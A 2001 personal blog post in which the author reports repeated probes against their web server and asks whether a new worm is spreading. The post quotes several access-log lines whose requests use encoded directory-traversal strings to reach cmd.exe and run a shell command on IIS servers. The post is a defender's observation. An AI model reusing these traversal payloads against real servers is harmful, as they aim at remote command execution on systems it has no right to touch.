Where


When

Who

< So tonight is anime night | Main | Well, that bit of stuff >

September 18, 2001

So once again, there seems

So once again, there seems to be some kind program trying to hack into my system. And once again, the twits doing it don't seem to realize that I am not running IIS. The thing is, I'm getting hits for this from a ton of machines. Anyone know of a new worm making the rounds? The hits look like this:

209.67.61.53 - - [18/Sep/2001:10:03:56 -0400] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 320 "-" "-"
209.67.61.53 - - [18/Sep/2001:10:03:56 -0400] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 320 "-" "-"
209.67.61.53 - - [18/Sep/2001:10:03:56 -0400] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 336 "-" "-"
209.67.61.53 - - [18/Sep/2001:10:03:56 -0400] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302 "-" "-"

Posted by snooze at September 18, 2001 3:13 PM